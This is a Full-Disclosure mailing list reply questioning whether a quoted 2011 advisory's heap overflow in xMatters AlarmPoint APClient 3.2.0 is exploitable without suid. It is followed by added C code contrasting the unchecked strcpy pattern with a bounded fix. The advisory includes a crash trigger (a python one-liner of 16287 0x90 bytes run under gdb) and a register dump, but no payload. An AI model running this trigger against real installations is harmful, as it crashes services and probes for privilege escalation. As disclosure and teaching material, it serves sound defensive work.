Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient
- From: Mario Vilas <mvilas@xxxxxxxxx>
- Date: Thu, 28 Apr 2011 14:40:22 -0300
Is the suid bit set on that binary? Otherwise, unless I'm missing something,
it doesn't seem to be exploitable by an attacker...
On Thu, Apr 28, 2011 at 12:03 PM, Juan Sacco
<jsacco@xxxxxxxxxxxxxxxxxxxxxx> wrote:
> Information
> --------------------
> Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
> Version: APClient 3.2.0 (native)
> Software : xMatters AlarmPoint
> Vendor Homepage : http://www.xmatters.com
> Vulnerability Type : Heap Buffer Overflow
> Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin
> Severity : High
> Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>
>
> Description
> ------------------
> The AlarmPoint Java Server consists of a collection of software
> components and software APIs designed to provide a flexible and
> powerful set of tools for integrating various applications to
> AlarmPoint.
>
> Details
> -------------------
> AlarmPoint APClient is affected by a Heap Overflow vulnerability in
> version APClient 3.2.0 (native)
>
> A heap overflow condition is a buffer overflow, where the buffer that
> can be overwritten is allocated in the heap portion of memory, generally
> meaning that the buffer was allocated using a routine such as the POSIX
> malloc() call.
> https://www.owasp.org/index.php/Heap_overflow
>
>
> Exploit as follows:
> Submit a malicious file containing the exploit
> root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$
> ./APClient.bin --submit-file maliciousfile.hex
> or
> (gdb) run `python -c 'print "\x90"*16287'`
> Starting program:
> /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c
> 'print "\x90"*16287'`
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x0804be8a in free ()
> (gdb) i r
> eax 0xa303924 170932516
> ecx 0xbfb8 49080
> edx 0xa303924 170932516
> ebx 0x8059438 134583352
> esp 0xbfff3620 0xbfff3620
> ebp 0xbfff3638 0xbfff3638
> esi 0x8059440 134583360
> edi 0x80653f0 134632432
> eip 0x804be8a 0x804be8a <free+126>
> eflags 0x210206 [ PF IF RF ID ]
> cs 0x73 115
> ss 0x7b 123
> ds 0x7b 123
> es 0x7b 123
> fs 0x0 0
> gs 0x33 51
> (gdb)
>
>
> Solution
> -------------------
> No patches are available at this time.
>
> Credits
> -------------------
> Manually discovered by Insecurity Research Labs
> Juan Sacco - http://www.insecurityresearch.com
>
> --
> --
> _________________________________________________
> Insecurity Research - Security auditing and testing software
> Web: http://www.insecurityresearch.com
> Insect Pro 2.5 was released, stay tuned
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”
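As an added illustration of the bug class named in the advisory above (example code written for this page, not APClient's source; the buffer size ARG_CAP, the function names and the filler input are hypothetical), here is the unchecked-copy pattern that produces a heap overflow from an over-long argument, beside a bounded version that rejects the input instead:

```c
/* Added example, not APClient's code. Shows the heap-overflow pattern the
 * advisory describes: attacker-controlled input copied into a fixed-size
 * malloc() buffer without a length check, next to a bounded version.
 * ARG_CAP and the function names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ARG_CAP 256   /* hypothetical fixed heap buffer size */

/* Vulnerable pattern: the allocation is fixed but the input length is never
 * checked, so strcpy() writes past the chunk and corrupts adjacent heap
 * data and allocator metadata. The damage usually surfaces later, when the
 * allocator walks that metadata, which is why a crash lands in free() as in
 * the advisory's backtrace. Shown for contrast only; never call it with
 * input longer than ARG_CAP - 1. */
int submit_unchecked(const char *arg)
{
    char *buf = malloc(ARG_CAP);
    if (buf == NULL)
        return -1;
    strcpy(buf, arg);          /* no bound on strlen(arg) */
    /* ... use buf ... */
    free(buf);
    return 0;
}

/* Hardened version: measure the input before allocating or copying, reject
 * anything that does not fit including its terminator, and copy with an
 * explicit, already-validated length. Returns 0 on success, -1 on reject. */
int submit_bounded(const char *arg)
{
    size_t len = strlen(arg);
    if (len >= ARG_CAP)        /* no room for the NUL terminator: reject */
        return -1;
    char *buf = malloc(ARG_CAP);
    if (buf == NULL)
        return -1;
    memcpy(buf, arg, len + 1); /* copies the terminator too */
    /* ... use buf ... */
    free(buf);
    return 0;
}

/* Constructed test input: n bytes of the 0x90 filler the advisory's gdb
 * run used, NUL-terminated. Caller frees. */
char *make_filler(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return NULL;
    memset(s, 0x90, n);
    s[n] = '\0';
    return s;
}

int main(int argc, char **argv)
{
    const char *arg = argc > 1 ? argv[1] : "hello";
    printf("bounded submit: %s\n",
           submit_bounded(arg) == 0 ? "accepted" : "rejected (too long)");
    return 0;
}
```

Run it with a long argument (for instance the 16287-byte string from the advisory) and the bounded version refuses the input before any copy happens; the unchecked version is the shape to look for in a code review of any tool that takes file contents or argv data into a malloc()'d buffer. Whether such a crash matters beyond a local denial of service depends on the privilege boundary the reply above asks about: a setuid binary or one invoked by a higher-privileged service turns it into an escalation path, a plain user-owned binary does not.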